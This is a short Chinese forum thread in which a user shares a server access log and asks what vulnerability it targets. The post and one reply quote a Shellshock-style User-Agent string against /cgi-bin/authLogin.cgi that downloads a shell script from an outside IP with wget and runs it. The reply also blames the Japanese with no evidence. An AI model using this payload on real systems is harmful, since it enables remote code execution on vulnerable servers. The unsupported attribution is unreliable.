网站访问记录有恶意的user agent

魔神翼 发布于 2014/12/14 10:18
阅读 508
收藏 0
() { :; }; /bin/rm -rf /tmp/S0.sh && /bin/mkdir -p /share/HDB_DATA/.../php && /usr/bin/wget -c http://185.14.30.79/S0.sh -P /tmp && /bin/sh /tmp/S0.sh 0<&1 2>&1

212.30.214.244 - - [14/Dec/2014:09:40:02 +0800] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 993
212.30.214.244 - - [14/Dec/2014:09:40:02 +0800] "  " 400 -


IP都是国外的。

这是利用什么漏洞?



加载中
0
Altman
Altman
哥,你是我们公司的么?怎么这日志和前几天公司服务器发现的一模一样
Altman
Altman
回复 @魔神翼 : 哦 好吧
魔神翼
魔神翼
这是我学校的服务器
0
h
heshiyou
这是小日本攻击我国服务器,试图使用CGI-BIN中的漏洞,完整报文为:
GET /cgi-bin/authLogin.cgi HTTP/1.1
Host: 127.0.0.1
User-Agent: () { :; }; /bin/rm -rf /tmp/S0.sh && /bin/mkdir -p /share/HDB_DATA/.../php && /usr/bin/wget -c http://185.14.30.79/S0.sh -P /tmp && /bin/sh /tmp/S0.sh 0<&1 2>&1










 -t500
服务器记录的访问者IP为:182.171.234.167


返回顶部
顶部